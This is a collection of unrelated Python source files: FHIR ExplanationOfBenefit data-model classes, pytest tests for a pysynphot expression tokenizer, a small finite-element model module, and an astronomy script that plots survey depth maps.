'child_variable': 'udi'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'revenue'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'quantity'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'modifier'},
]
class ExplanationOfBenefit_SubDetail(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: A service line number.
type: The type of product or service.
revenue: The type of reveneu or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: A code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI).
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
programCode: For programs which require reson codes for the inclusion,
covering, of this billed item under the program or sub-program.
quantity: The number of repetitions of a service or product.
unitPrice: The fee for an addittional service or product or charge.
factor: A real number that represents a multiplier used in determining
the overall value of services delivered and/or goods received. The
concept of a Factor allows for a discount or surcharge multiplier to
be applied to a monetary amount.
net: The quantity times the unit price for an addittional service or
product or charge. For example, the formula: unit Quantity * unit
Price (Cost per Point) * factor Number * points = net Amount.
Quantity, factor and points are assumed to be 1 if not supplied.
udi: List of Unique Device Identifiers associated with this line item.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
"""
__name__ = 'ExplanationOfBenefit_SubDetail'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.type = None
# reference to CodeableConcept
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.programCode = None
# type: list
# reference to CodeableConcept
self.quantity = None
# reference to Quantity
self.unitPrice = None
# reference to Money
self.factor = None
# type: int
self.net = None
# reference to Money
self.udi = None
# type: list
# reference to Reference: identifier
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'net'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'programCode'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'unitPrice'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'modifier'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'udi'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'service'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'adjudication'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'revenue'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'quantity'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'type'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_SubDetail',
'child_variable': 'category'},
]
class ExplanationOfBenefit_AddItem(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequenceLinkId: List of input service items which this service line is
intended to replace.
revenue: The type of reveneu or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: If this is an actual service or product line, ie. not a
Group, then use code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI). If a
grouping item then use a group code to indicate the type of thing
being grouped eg. 'glasses' or 'compound'.
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
fee: The fee charged for the professional service or product.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
detail: The second tier service adjudications for payor added
services.
"""
__name__ = 'ExplanationOfBenefit_AddItem'
def __init__(self, dict_values=None):
self.sequenceLinkId = None
# type: list
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.fee = None
# reference to Money
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.detail = None
# type: list
# reference to ExplanationOfBenefit_Detail1
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'service'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'modifier'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'fee'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'revenue'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'adjudication'},
{'parent_entity': 'ExplanationOfBenefit_Detail1',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_AddItem',
'child_variable': 'detail'},
]
class ExplanationOfBenefit_Detail1(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
revenue: The type of reveneu or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: A code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI).
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
fee: The fee charged for the professional service or product.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
"""
__name__ = 'ExplanationOfBenefit_Detail1'
def __init__(self, dict_values=None):
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.fee = None
# reference to Money
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'service'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'revenue'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'category'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'adjudication'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'fee'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail1',
'child_variable': 'modifier'},
]
class ExplanationOfBenefit_Payment(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
type: Whether this represents partial or complete payment of the
claim.
adjustment: Adjustment to the payment of this transaction which is not
related to adjudication of this transaction.
adjustmentReason: Reason for the payment adjustment.
date: Estimated payment date.
amount: Payable less any payment adjustment.
identifier: Payment identifer.
"""
__name__ = 'ExplanationOfBenefit_Payment'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.adjustment = None
# reference to Money
self.adjustmentReason = None
# reference to CodeableConcept
self.date = None
# type: str
self.amount = None
# reference to Money
self.identifier = None
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'adjustmentReason'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'identifier'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'adjustment'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'amount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payment',
'child_variable': 'type'},
]
class ExplanationOfBenefit_ProcessNote(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
number: An integer associated with each note which may be referred to
from each service line item.
type: The note purpose: Print/Display.
text: The note text.
language: The ISO-639-1 alpha 2 code in lower case for the language,
optionally followed by a hyphen and the ISO-3166-1 alpha 2 code for
the region in upper case; e.g. "en" for English, or "en-US" for
American English versus "en-EN" for England English.
"""
__name__ = 'ExplanationOfBenefit_ProcessNote'
def __init__(self, dict_values=None):
self.number = None
# type: int
self.type = None
# reference to CodeableConcept
self.text = None
# type: str
self.language = None
# reference to CodeableConcept
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_ProcessNote',
'child_variable': 'language'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_ProcessNote',
'child_variable': 'type'},
]
class ExplanationOfBenefit_BenefitBalance(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
category: Dental, Vision, Medical, Pharmacy, Rehab etc.
subCategory: Dental: basic, major, ortho; Vision exam, glasses,
contacts; etc.
excluded: True if the indicated class of service is excluded from the
plan, missing or False indicated the service is included in the
coverage.
name: A short name or tag for the benefit, for example MED01, or
DENT2.
description: A richer description of the benefit, for example 'DENT2
covers 100% of basic, 50% of major but exclused Ortho, Implants and
Costmetic services'.
network: Network designation.
unit: Unit designation: individual or family.
term: The term or period of the values such as 'maximum lifetime
benefit' or 'maximum annual vistis'.
financial: Benefits Used to date.
"""
__name__ = 'ExplanationOfBenefit_BenefitBalance'
def __init__(self, dict_values=None):
self.category = None
# reference to CodeableConcept
self.subCategory = None
# reference to CodeableConcept
self.excluded = None
# type: bool
self.name = None
# type: str
self.description = None
# type: str
self.network = None
# reference to CodeableConcept
self.unit = None
# reference to CodeableConcept
self.term = None
# reference to CodeableConcept
self.financial = None
# type: list
# reference to ExplanationOfBenefit_Financial
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'subCategory'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'term'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'unit'},
{'parent_entity': 'ExplanationOfBenefit_Financial',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'financial'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_BenefitBalance',
'child_variable': 'network'},
]
class ExplanationOfBenefit_Financial(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
type: Deductable, visits, benefit amount.
allowedUnsignedInt: Benefits allowed.
allowedString: Benefits allowed.
allowedMoney: Benefits allowed.
usedUnsignedInt: Benefits used.
usedMoney: Benefits used.
"""
__name__ = 'ExplanationOfBenefit_Financial'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.allowedUnsignedInt = None
# type: int
self.allowedString = None
# type: str
self.allowedMoney = None
# reference to Money
self.usedUnsignedInt = None
# type: int
self.usedMoney = None
# reference to Money
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Financial',
'child_variable': 'type'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Financial',
'child_variable': 'allowedMoney'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Financial',
'child_variable': 'usedMoney'},
]
|
40570
|
from __future__ import absolute_import, division, print_function
import pytest
from ..spparser import Scanner
scanner = Scanner()
# Test of a single instance of each token. Does not test them in
# context, but at least it tests that each one is recognized.
tokens = [
# bug: the original pysynphot could not recognize integer
# ('INTEGER', '1'),
# basic float
('FLOAT', '.1'),
('FLOAT', '1.1'),
('FLOAT', '1.'),
('FLOAT', '1'),
# basic float with e+
('FLOAT', '.1e+1'),
('FLOAT', '1.1e+1'),
('FLOAT', '1.e+1'),
('FLOAT', '1e+1'),
# basic float with e-
('FLOAT', '.1e-1'),
('FLOAT', '1.1e-1'),
('FLOAT', '1.e-1'),
('FLOAT', '1e-1'),
# basic float with e
('FLOAT', '.1e1'),
('FLOAT', '1.1e1'),
('FLOAT', '1.e1'),
('FLOAT', '1e1'),
# identifier
('IDENTIFIER', 'xyzzy'),
('IDENTIFIER', 'xyzzy20'),
('IDENTIFIER', '20xyzzy'),
('IDENTIFIER', '20xyzzy20'),
# special characters
('LPAREN', '('),
('RPAREN', ')'),
(',', ','),
('/', ' / '),
# filename
('IDENTIFIER', '/a/b/c'),
('IDENTIFIER', 'foo$bar'),
('IDENTIFIER', 'a/b'),
# file list
('FILELIST', '@arf'),
('FILELIST', '@narf')]
def print_token_list(tklist):
s = 'Token list: {} items\n'.format(len(tklist))
for x in tklist:
s += '{:<20s} \n'.format(x.type, x.attr)
s += '---\n'
return s
def ptl2(tkl):
"""
Use this to generate the list of tokens in a form easy to copy/paste
into a test.
"""
s = ''
for x in tkl:
s += ' ( "{}", {} ), \n'.format(x.type, repr(x.attr))
s += '\n'
return s
def stream_t(text, result):
"""
Parse a bit of text and compare it to the expected token stream.
Each actual test function calls this.
"""
tkl = scanner.tokenize(text)
msg = print_token_list(tkl)
assert result is not None, \
msg + 'NO EXPECT LIST\n [\n' + ptl2(tkl) + ' ]\n'
for n, (expect, actual) in enumerate(zip(result, tkl)):
assert expect[0] == actual.type and expect[1] == actual.attr, \
(msg + '{} expect={} actual=({}, {})'.format(
n, expect, actual.type, actual.attr))
@pytest.mark.parametrize(
('text', 'result'),
[('spec($PYSYN_CDBS//calspec/gd71_mod_005.fits)',
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', '$PYSYN_CDBS//calspec/gd71_mod_005.fits'),
('RPAREN', None)]),
(('spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),'
'band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+'
'spec(el1302a.fits)+spec(el1356a.fits)+'
'spec(el2471a.fits))*0.5'),
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None),
('*', None),
('FLOAT', '0.5')]),
(('spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),'
'band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)*0.1+'
'spec(el1302a.fits)*0.066666667+spec(el1356a.fits)*0.0060+'
'spec(el2471a.fits)*0.0050)'),
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.1'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.066666667'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0060'),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.0050'),
('RPAREN', None)]),
(('spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),'
'22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+'
'spec(el1356a.fits)+spec(el2471a.fits))'),
[('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'earthshine.fits'),
('RPAREN', None),
('*', None),
('FLOAT', '0.5'),
('+', None),
('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'Zodi.fits'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'johnson'),
(',', None),
('IDENTIFIER', 'v'),
('RPAREN', None),
(',', None),
('FLOAT', '22.7'),
(',', None),
('IDENTIFIER', 'vegamag'),
('RPAREN', None),
('+', None),
('LPAREN', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1215a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1302a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el1356a.fits'),
('RPAREN', None),
('+', None),
('IDENTIFIER', 'spec'),
('LPAREN', None),
('IDENTIFIER', 'el2471a.fits'),
('RPAREN', None),
('RPAREN', None)])])
def test_stream(text, result):
stream_t(text, result)
@pytest.mark.xfail(reason='does not work')
@pytest.mark.parametrize(
('text', 'result'),
[('rn(unit(1.,flam),band(stis,ccd,g430m,c4451,52X0.2),10.000000,abmag)',
[('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'unit'),
('LPAREN', None),
('FLOAT', '1.'),
(',', None),
('IDENTIFIER', 'flam'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'stis'),
(',', None),
('IDENTIFIER', 'ccd'),
(',', None),
('IDENTIFIER', 'g430m'),
(',', None),
('IDENTIFIER', 'c4451'),
(',', None),
('IDENTIFIER', '52X0.2'),
('RPAREN', None),
(',', None),
('FLOAT', '10.000000'),
(',', None),
('IDENTIFIER', 'abmag'),
('RPAREN', None)]),
('rn(unit(1.,flam),band(stis,ccd,mirror,50CCD),10.000000,abmag)',
[('IDENTIFIER', 'rn'),
('LPAREN', None),
('IDENTIFIER', 'unit'),
('LPAREN', None),
('FLOAT', '1.'),
(',', None),
('IDENTIFIER', 'flam'),
('RPAREN', None),
(',', None),
('IDENTIFIER', 'band'),
('LPAREN', None),
('IDENTIFIER', 'stis'),
(',', None),
('IDENTIFIER', 'ccd'),
(',', None),
('IDENTIFIER', 'mirror'),
(',', None),
('IDENTIFIER', '50CCD'),
('RPAREN', None),
(',', None),
('FLOAT', '10.000000'),
(',', None),
('IDENTIFIER', 'abmag'),
('RPAREN', None)])])
def test_stream_xfail(text, result):
stream_t(text, result)
@pytest.mark.xfail(reason='does not work')
def test_tokens():
for x in tokens:
typ, val = x
tkl = scanner.tokenize(val)
assert len(tkl) == 1, 'too many tokens\n' + print_token_list(tkl)
assert tkl[0].type == typ, \
('wrong type: found {} want {}\n'.format(tkl[0].type, typ) +
print_token_list(tkl))
assert tkl[0].attr == val or tkl[0].attr is None or \
(val.startswith('@') and tkl[0].attr == val[1:]), \
('token value incorrect: found {} want {}'.format(
tkl[0].attr, val) + print_token_list(tkl))
|
40597
|
import numpy as np
import pandas as pd
from welib.tools.clean_exceptions import *
from welib.FEM.graph import Node as GraphNode
from welib.FEM.graph import Element as GraphElement
from welib.FEM.graph import NodeProperty
from welib.FEM.graph import GraphModel
class MaterialProperty(NodeProperty):
def __init__(self):
Property.__init__(self)
pass
class FEMNode(GraphNode):
def __init__(self, ID, x, y, z=0, Type=None, DOFs=[]):
GraphNode.__init__(self, ID, x, y, z)
self.DOFs = DOFs
def __repr__(self):
s='<Node{:4d}> x:{:7.2f} y:{:7.2f} z:{:7.2f}, DOFs: {}'.format(self.ID, self.x, self.y, self.z, self.DOFs)
return s
class FEMElement(GraphElement):
def __init__(self, ID, nodeIDs, nodes=None, properties=None):
GraphElement.__init__(self, ID, nodeIDs, nodes, properties)
self.Ce=[]
self.Ke=[]
self.Me=[]
def __repr__(self):
s='<Elem{:4d}> NodeIDs: {}'.format(self.ID, self.nodeIDs)
if self.nodes is not None:
s+=' l={:.2f}'.format(self.length)
return s
class BeamElement(FEMElement):
def __init__(self, ID, nodeIDs, nodes, properties=None):
super(BeamElement,self).__init__(ID, nodeIDs, nodes=nodes, properties=properties)
class FEMModel(GraphModel):
def __init__(self):
GraphModel.__init__(self)
self.MM = None
self.KK = None
self.DD = None
self.nDOF = None
def setFullMatrices(self,MM,KK,DD=None):
self.MM=MM
self.KK=KK
if DD is not None:
self.DD=DD
def CraigBampton(self, Ileader, Ifollow=None, Ifixed=None):
""" """
from welib.FEM.reduction import CraigBampton
if Ifixed is not None:
M,K = self.applyFixBC()
else:
M,K = self.MM, self.KK
return CraigBampton(M, K, Ileader, Ifollow=Ifollow)
def DOF2Nodes(self):
DOF2Nodes=np.zeros((self.nDOF,4),int)
for iN,node in enumerate(self.Nodes):
for iiDOF,iDOF in enumerate(node.DOFs):
DOF2Nodes[iDOF,0] = iDOF
DOF2Nodes[iDOF,1] = iN
DOF2Nodes[iDOF,2] = len(node.DOFs)
DOF2Nodes[iDOF,3] = iiDOF+1
return DOF2Nodes
if __name__=='__main__':
np.set_printoptions(linewidth=500)
mdl=SubDynModel()
mdl.fromSummaryFile('../../data/Monopile/Pendulum.SD.sum.yaml')
|
40622
|
from __future__ import print_function
from astrometry.util.fits import *
import pylab as plt
import numpy as np
from glob import glob
from astrometry.util.plotutils import *
from astrometry.libkd.spherematch import *
from astrometry.util.resample import *
from astrometry.util.util import *
ps = PlotSequence('cosmos')
baseA = 'cosmos-dr5-60/'
baseB = 'cosmos-dr5-67/'
Atxt = '60'
Btxt = '67'
TA = merge_tables([fits_table(fn) for fn in glob(baseA + 'tractor/*/tractor-*.fits')])
print('Total of', len(TA), 'sources in 60')
TA.cut(TA.brick_primary)
print(len(TA), 'brick primary')
TB = merge_tables([fits_table(fn) for fn in glob(baseB + 'tractor/*/tractor-*.fits')])
print('Total of', len(TB), 'sources in 67')
TB.cut(TB.brick_primary)
print(len(TB), 'brick primary')
ramin = min(TA.ra.min(), TB.ra.min())
ramax = max(TA.ra.max(), TB.ra.max())
decmin = min(TA.dec.min(), TB.dec.min())
decmax = max(TA.dec.max(), TB.dec.max())
# Create low-res depth maps
pixsc = 10. * 0.262/3600.
rc,dc = (ramin+ramax)/2., (decmin+decmax)/2.
w = int((ramax - ramin) * np.cos(np.deg2rad(dc)) / pixsc)
h = int((decmax - decmin) / pixsc)
wcs = Tan(rc, dc, w/2., h/2., -pixsc, 0., 0., pixsc, float(w), float(h))
#print('WCS:', wcs)
#for band in ['g','r','z']:
for band in ['g']:
psfdepthA = np.zeros(wcs.shape, np.float32)
psfdepthB = np.zeros(wcs.shape, np.float32)
for fn in glob(baseA + 'coadd/*/*/legacysurvey-*-depth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
psfdepthA[Yo,Xo] = dmap[Yi,Xi]
for fn in glob(baseB + 'coadd/*/*/legacysurvey-*-depth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
psfdepthB[Yo,Xo] = dmap[Yi,Xi]
galdepthA = np.zeros(wcs.shape, np.float32)
galdepthB = np.zeros(wcs.shape, np.float32)
for fn in glob(baseA + 'coadd/*/*/legacysurvey-*-galdepth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
galdepthA[Yo,Xo] = dmap[Yi,Xi]
for fn in glob(baseB + 'coadd/*/*/legacysurvey-*-galdepth-%s.fits*' % band):
print('Reading', fn)
iwcs = Tan(fn, 1)
Yo,Xo,Yi,Xi,nil = resample_with_wcs(wcs, iwcs)
dmap = fitsio.read(fn)
#I = np.flatnonzero(np.isfinite(dmap) * (dmap > 0))
#print(len(I), 'finite & positive values')
galdepthB[Yo,Xo] = dmap[Yi,Xi]
print('PsfdepthA (iv)', psfdepthA.min(), psfdepthA.max())
print('PsfdepthB (iv)', psfdepthB.min(), psfdepthB.max())
psfdepthA = -2.5 * (np.log10(5./np.sqrt(psfdepthA)) - 9)
psfdepthB = -2.5 * (np.log10(5./np.sqrt(psfdepthB)) - 9)
print('PsfdepthA', psfdepthA.min(), psfdepthA.max())
print('PsfdepthB', psfdepthB.min(), psfdepthB.max())
galdepthA = -2.5 * (np.log10(5./np.sqrt(galdepthA)) - 9)
galdepthB = -2.5 * (np.log10(5./np.sqrt(galdepthB)) - 9)
print('GaldepthA', galdepthA.min(), galdepthA.max())
print('GaldepthB', galdepthB.min(), galdepthB.max())
ima = dict(interpolation='nearest', origin='lower',
extent=[ramax,ramin,decmin,decmax], vmin=20.0, vmax=24.5)
plt.clf()
plt.subplot(1,2,1)
plt.imshow(psfdepthA, **ima)
plt.title(Atxt)
plt.subplot(1,2,2)
plt.imshow(psfdepthB, **ima)
plt.title(Btxt)
plt.suptitle('PSF Depth maps (%s)' % band)
ps.savefig()
plt.clf()
plt.subplot(1,2,1)
plt.imshow(galdepthA, **ima)
plt.title(Atxt)
plt.subplot(1,2,2)
plt.imshow(galdepthB, **ima)
plt.title(Btxt)
